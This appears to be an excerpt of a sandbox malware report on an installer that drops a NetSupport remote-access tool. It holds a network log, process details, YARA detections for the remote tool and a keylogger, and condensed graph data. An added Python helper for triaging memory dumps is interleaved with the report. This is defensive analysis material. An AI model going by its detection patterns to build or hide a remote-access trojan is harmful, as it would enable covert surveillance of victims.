3           192.168.2.4  49906        104.26.1.231    80                7172  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 11:52:15.507668018 CET  118                OUT        GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Dec 15, 2024 11:52:16.788511038 CET  1119               IN         HTTP/1.1 404 Not Found
Date: Sun, 15 Dec 2024 10:52:16 GMT
Content-Type: text/html; charset=us-ascii
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8f25e21ab89c4338-EWR
CF-Cache-Status: DYNAMIC
cf-apo-via: origin,host
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jfYwYM9bxyLZTHQnZA2iLjiXKPbdYJRQgd0fczWeQrQSQ8pNzzvTM0BSEPWP317mfIOQaCJv1OHZAmuj2ceaUiII%2B3ZCffGWpqH5d1pmvrkbb6MbyfXeeNAfigEYYKeIxnbP9M63rjEnrMmR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0



Target ID: 0
Start time: 05:50:20
Start date: 15/12/2024
Path: C:\Users\user\Desktop\Merge.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Merge.exe"
Imagebase: 0xde0000
File size: 44'935'240 bytes
MD5 hash: D024FF2FC7ACB7C172F0BA38A9FBC2C3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 6
Start time: 05:51:30
Start date: 15/12/2024
Path: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
Imagebase: 0xae0000
File size: 7'058'272 bytes
MD5 hash: F78F5CC0A0B3AF7AF5485BB47B4809C0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951937785.000000000A642000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A63B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3110032044.0000000005866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2627011351.0000000007AED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A624000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951725255.000000000A777000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2944484464.000000000A642000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3124698930.000000000A720000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951937785.000000000A660000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2944931640.000000000A6BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951583851.000000000A71A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2935540782.000000000A642000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2616773901.0000000007AEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943414129.000000000A6BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:false
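Most of the YARA hits listed above sit in PAGE_READWRITE private memory (heap and other data), a few in mapped images (MEM_IMAGE, last field non-zero), and one, 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, in a PAGE_EXECUTE_READWRITE private region, which is the region to carve when looking for the unpacked code. The Python below is an added triage helper, not code from the report or from Joe Security: it decodes the region attributes encoded in each .sdmp name and groups the hits. The field layout of the name is an assumption inferred from the values on this page and the Win32 PAGE_*/MEM_* constants; the meaning of the dump-kind field (2 versus 3) and of the sixth field is likewise assumed, not documented here. The four sample lines are copied from the list above.

```python
"""Triage Joe Sandbox YARA hits by the attributes encoded in the .sdmp name.

Added example, not code from the Joe Sandbox report or from Joe Security.
SAMPLE_HITS are four lines copied from this report's YARA list. The field
layout pid.kind.seq.base.protect.f6.type.module is an ASSUMPTION inferred
from those values plus the winnt.h PAGE_* / MEM_* constants.
"""
import re
from collections import Counter

# winnt.h memory-protection values (MEMORY_BASIC_INFORMATION.Protect).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_BITS = 0xF0  # any PAGE_EXECUTE* value has one of these bits set
# winnt.h region types (MEMORY_BASIC_INFORMATION.Type).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: pid.kind.seq.base.protect.f6.type.module.sdmp
SDMP_RE = re.compile(
    r"(?P<pid>[0-9a-f]{8})\.(?P<kind>[0-9a-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<module>[0-9a-f]{8})\.sdmp",
    re.IGNORECASE,
)
YARA_RE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<src>\S+?\.sdmp)")


def parse_sdmp(name: str) -> dict:
    """Decode one .sdmp name into process, base address and region attributes."""
    m = SDMP_RE.fullmatch(name)
    if m is None:
        raise ValueError(f"unrecognised dump name: {name}")
    protect = int(m["protect"], 16)
    mtype = int(m["type"], 16)
    return {
        "process": int(m["pid"], 16),
        # Assumption: 2 = dump taken at process end, 3 = dump taken during runtime.
        "dump_kind": int(m["kind"], 16),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "executable": bool(protect & EXEC_BITS),
        "field6": m["f6"].lower(),  # not decoded: 0x20 / 0x1000 / 0x1 on this page
        "type": MEM_TYPE.get(mtype, hex(mtype)),
        "module": int(m["module"], 16),  # non-zero only for MEM_IMAGE regions here
    }


def category(region: dict) -> str:
    """image: loaded module; exec_private: likely unpacked code; data: heap/stack."""
    if region["type"] == "MEM_IMAGE":
        return "image"
    if region["executable"] and region["type"] == "MEM_PRIVATE":
        return "exec_private"
    return "data"


def triage(lines) -> list:
    """Parse YARA result lines; one dict per hit with rule name and region attributes."""
    hits = []
    for line in lines:
        m = YARA_RE.search(line)
        if m is None:
            continue  # not a YARA result line (header, AV line, ...)
        region = parse_sdmp(m["src"])
        region["rule"] = m["rule"].strip()
        region["category"] = category(region)
        hits.append(region)
    return hits


def summarize(hits) -> dict:
    """Hit count per category."""
    return dict(Counter(h["category"] for h in hits))


def carve_candidates(hits) -> list:
    """Bases of writable+executable private regions: where to carve an unpacked PE."""
    return sorted({h["base"] for h in hits if h["category"] == "exec_private"})


# Copied from the report's YARA list (constructed subset, four of the hits).
SAMPLE_HITS = """\
Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
""".splitlines()

if __name__ == "__main__":
    hits = triage(SAMPLE_HITS)
    for h in hits:
        print(f"pid {h['process']} {h['base']:#012x} {h['protect']:<22} "
              f"{h['type']:<11} {h['category']:<12} {h['rule']}")
    print("summary:", summarize(hits))
    print("carve:", [hex(b) for b in carve_candidates(hits)])
```

Run on the full YARA list (paste the lines into `triage`), the hits collapse to a handful of distinct regions in process 6; the `exec_private` ones are the dumps to pull and check for a PE header, and the `image` ones identify which loaded modules (by the module field) the NetSupport rules fire on.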


                                                                                                    Execution Graph

                                                                                                    Execution Coverage:22.6%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:1.4%
                                                                                                    Total number of Nodes:487
                                                                                                    Total number of Limit Nodes:9
                                                                                                    execution_graph: rendered graph not recoverable in text. What the node labels preserve: node addresses from 0x016AD364 to 0x01732A53; Win32 APIs reached from the graph: EnterCriticalSection, LeaveCriticalSection, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, GetLastError, SetLastError, IsProcessorFeaturePresent, TlsGetValue, TlsSetValue, RtlAllocateHeap, RtlFreeHeap, GetProcAddress, LoadLibraryExW, FreeLibrary, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess, GetModuleHandleW, GetModuleHandleExW, SetConsoleCtrlHandler, ExitThread, CloseHandle, FreeLibraryAndExitThread, RtlUnwind; named internals on the nodes: ___free_lconv_mon, _ValidateLocalCookies, ___except_validate_context_record, __IsNonwritableInCurrentImage, __EH_prolog3 (MSVC C runtime symbols). The FreeLibrary node at 0x016DCA06 is reached from the function starting at 0x016DC946 via LoadLibraryExW, matching the API reference 016DCA07 listed under Control-flow Graph below.

                                                                                                    Callgraph

                                                                                                    callgraph: rendered graph not recoverable in text. What the node labels preserve: 119 functions, Function_016AD364 through Function_0173902B plus the out-of-range Function_00F04960, with caller->callee edges between them.

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BBD71996,?,016DCA55,?,?,00000000), ref: 016DCA07
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3664257935-537541572
                                                                                                    • Opcode ID: 81dc1961cce3c0710e2073e92b21befb50595e87c3beddb61470dd0979e37021
                                                                                                    • Instruction ID: 83f709dc6cea420b49c49b66f667e8671520ce3fbe32761874e4b002084a5b52
                                                                                                    • Opcode Fuzzy Hash: 81dc1961cce3c0710e2073e92b21befb50595e87c3beddb61470dd0979e37021
                                                                                                    • Instruction Fuzzy Hash: DC219032E01225EBEB329B699C41A6A3B69AF41770B150229F916FB385D730ED11C7D1

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 21 16bb2cd-16bb2da call 16dbdc4 24 16bb31a-16bb31d ExitThread 21->24 25 16bb2dc-16bb2e4 21->25 25->24 26 16bb2e6-16bb2ea 25->26 27 16bb2ec call 16dd008 26->27 28 16bb2f1-16bb2f7 26->28 27->28 30 16bb2f9-16bb2fb 28->30 31 16bb304-16bb30a 28->31 30->31 32 16bb2fd-16bb2fe CloseHandle 30->32 31->24 33 16bb30c-16bb30e 31->33 32->31 33->24 34 16bb310-16bb314 FreeLibraryAndExitThread 33->34 34->24
                                                                                                    APIs
                                                                                                      • Part of subcall function 016DBDC4: GetLastError.KERNEL32(00000000,?,016CB4A6,016DC1A2,?,?,016DBCC0,00000001,00000364,?,00000006,000000FF,?,016BB23D,01D15E68,0000000C), ref: 016DBDC8
                                                                                                      • Part of subcall function 016DBDC4: SetLastError.KERNEL32(00000000), ref: 016DBE6A
                                                                                                    • CloseHandle.KERNEL32(?,?,?,016BB404,?,?,016BB276,00000000), ref: 016BB2FE
                                                                                                    • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,016BB404,?,?,016BB276,00000000), ref: 016BB314
                                                                                                    • ExitThread.KERNEL32 ref: 016BB31D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 1991824761-0
                                                                                                    • Opcode ID: ffe63896fdced98e39064e0cba09b4578ecd1f4db90fc70870381d1f569ff9b2
                                                                                                    • Instruction ID: 23e15c747d3d159162f1ab62cc65841e8b4933efa6b9ec2a4434c7c661f1c79b
                                                                                                    • Opcode Fuzzy Hash: ffe63896fdced98e39064e0cba09b4578ecd1f4db90fc70870381d1f569ff9b2
                                                                                                    • Instruction Fuzzy Hash: D5F05E30401611ABEB311E79CC88A9A7EADAF01362F488615FD35E22E5C730D581C791

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000002,?,016BA464,016CB280,016CB280,?,00000002,BBD71996,016CB280,00000002), ref: 016BA47B
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,016BA464,016CB280,016CB280,?,00000002,BBD71996,016CB280,00000002), ref: 016BA482
                                                                                                    • ExitProcess.KERNEL32 ref: 016BA494
                                                                                                    Memory Dump Source
